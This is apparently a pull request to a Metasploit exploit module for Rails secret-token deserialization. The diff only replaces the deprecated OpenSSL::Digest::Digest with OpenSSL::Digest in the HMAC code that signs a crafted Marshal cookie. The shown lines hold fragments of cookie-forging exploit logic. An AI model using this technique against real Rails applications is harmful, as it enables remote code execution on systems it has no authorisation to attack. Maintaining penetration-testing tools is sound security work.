### PR TITLE
Update rails_secret_deserialization.rb

### DIFF
--- a/modules/exploits/multi/http/rails_secret_deserialization.rb
+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote
       keygen = KeyGenerator.new(datastore['SECRET'],{:iterations => 1000})
       sigkey = keygen.generate_key(datastore['SALTSIG'])
     end
-    digest == OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new(datastore['DIGEST_NAME']), sigkey, data)
+    digest == OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new(datastore['DIGEST_NAME']), sigkey, data)
   end
 
   def rails_4
@@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def rails_3
     # Sign it with the secret_token
     data = build_cookie
-    digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new("SHA1"), datastore['SECRET'], data)
+    digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA1"), datastore['SECRET'], data)
     marshal_payload = Rex::Text.uri_encode(data)
     "#{marshal_payload}--#{digest}"
   end


### PR DESCRIPTION
In Ruby 2.1.0,  OpenSSL::Digest::Digest is depricated.
Even in Ruby 1.8.7-p374, OpenSSL::Digest::Digest is only provided for backward compatibility.
Should use OpenSSL::Digest
